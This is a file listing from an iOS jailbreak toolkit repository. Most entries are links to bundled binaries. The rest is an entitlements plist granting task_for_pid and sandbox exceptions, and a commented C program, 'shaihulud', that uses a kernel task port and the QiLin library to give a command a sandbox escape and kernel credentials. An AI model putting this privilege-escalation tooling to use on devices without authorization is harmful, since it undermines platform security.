--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/reset:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/reset
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sc_usage:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sc_usage
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/scp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/scp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/screen:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/screen
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/script:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/script
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sed:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sed
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/seq:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/seq
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/split:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/split
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sqlite3
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/stat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/stat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/syslog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/syslog
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tail:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tail
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tar
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tee:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tee
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/time:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/time
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/true:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/true
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tset:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tset
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/uicache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/uicache
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/uname:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/uname
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/vim:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/vim
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/vm_stat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/vm_stat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/w
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/wc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/wc
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/what:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/what
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/which:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/which
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/xargs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/xargs
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/xxd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/xxd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dbclient:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dbclient
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbear
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbear.orig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbear.orig
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearconvert
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearkey:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearkey
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearmulti:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearmulti
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/filemon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/filemon
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/jlutil:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/jlutil
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/joker:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/joker
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/jtool:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/jtool
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/procexp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/procexp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/procexp.ent:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | platform-application
5 |
6 | com.apple.private.security.sandbox.debug-mode
7 |
8 | com.apple.security.temporary-exception.sbpl
9 |
10 | (allow signal)
11 | (allow process-info-listpids)
12 | (allow process-info*)
13 |
14 | com.apple.security.exception.process-info
15 |
16 | get-task-allow
17 |
18 | task_for_pid-allow
19 |
20 | com.apple.system-task-ports
21 |
22 | com.apple.private.network.statistics
23 |
24 | com.apple.wlan.authentication
25 |
26 | com.apple.private.security.container-required
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/qilin.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/qilin.o
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/shaihulud:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/shaihulud
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/shaihulud.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "QiLin.h"
3 | #include
4 |
5 | #include
6 |
/* Empty status callback. main installs it via setDebugReporter, presumably to
 * suppress QiLin's debug reporting (status_func's signature is declared in
 * QiLin.h, not visible here). The trailing ';' after the body is harmless. */
void doNothing(void ) {};
/* Entry point: initialises QiLin against a kernel task port, then hands argv[1]
 * (and at most argv[2]) to spawnAndShaiHulud. Exit status is rc from initQiLin
 * on failure; otherwise main falls off the end without returning the result of
 * spawnAndShaiHulud, so that call's outcome is never reported to the caller. */
int main (int argc, char **argv)
{

    /* Local prototype for a QiLin function; doNothing is installed as the reporter. */
    void setDebugReporter (status_func *Func);

    setDebugReporter(doNothing);

    mach_port_t kernel_task;

    /* Requests host special port 4 and stores it as kernel_task — presumably a
     * kernel task port registered there by an earlier stage; confirm against QiLin.
     * kr is never checked, so a failure here surfaces only if initQiLin fails. */
    kern_return_t host_get_special_port(task_t, int node, int which, mach_port_t *);
    kern_return_t kr=host_get_special_port(mach_host_self(), 0, 4, &kernel_task);

    if (argc < 2) {
        fprintf(stderr,"Usage: shaihulud _cmd_ [_args_]\n");
        fprintf(stderr,"Bestow the might of ShaiHulud (Sandbox escape + kernel credentials) on command\n");
        exit(1);

    }

    /* Optional slide value read as "0x<hex>" from /tmp/slide.txt; stays 0 when
     * the file is missing or does not parse (the fscanf result is not checked).
     * Because the value comes from a file under /tmp, any process able to write
     * there influences the address passed to initQiLin below. */
    int slide = 0 ;
    FILE *ss = fopen("/tmp/slide.txt","r");
    if (ss) { fscanf (ss, "0x%x", &slide); fclose(ss); }


    /* Hard-coded address (presumably an unslid kernel base — confirm) plus slide;
     * initQiLin's contract is defined in QiLin.h, not visible here. */
    int rc = initQiLin (kernel_task, 0xfffffff007004000 + slide);

    if (rc) { fprintf(stderr,"Qilin Initialization failed!\n"); return rc;}

    /* Local prototype for a QiLin function. Only argv[1] and argv[2] are
     * forwarded; with argc == 2, argv[2] is argv's terminating NULL, and any
     * further arguments implied by the "[_args_]" usage text are dropped. */
    int spawnAndShaiHulud (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5);
    rc = spawnAndShaiHulud (argv[1], argv[2], NULL, NULL, NULL,NULL);


}
41 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/wget:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/wget
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbear
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbear.orig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbear.orig
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbearconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbearconvert
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbearkey:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbearkey
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/attr.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/attr.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/cap.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/cap.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/clone.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/clone.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/compctl.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/compctl.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complete.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complete.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complist.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complist.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/computil.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/computil.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/curses.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/curses.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/datetime.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/datetime.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/deltochar.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/deltochar.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/example.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/example.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/files.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/files.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/langinfo.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/langinfo.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mapfile.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mapfile.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/newuser.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/newuser.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/parameter.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/parameter.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/regex.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/regex.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/socket.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/socket.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/stat.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/stat.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/system.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/system.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/tcp.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/tcp.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/termcap.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/termcap.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/terminfo.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/terminfo.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zftp.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zftp.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zle.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zle.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zleparameter.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zleparameter.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zprof.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zprof.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zpty.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zpty.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zselect.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zselect.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zutil.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zutil.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/chown:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/chown
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/ioreg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/ioreg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/joreg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/joreg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/kextstat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/kextstat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/ltop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/ltop
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/netstat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/netstat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/sysctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/sysctl
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/taskpolicy:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/taskpolicy
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+arrows:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+arrows
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+csr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+csr
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+cup:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+cup
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+enq:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+enq
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+erase:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+erase
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idc
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idl:
--------------------------------------------------------------------------------
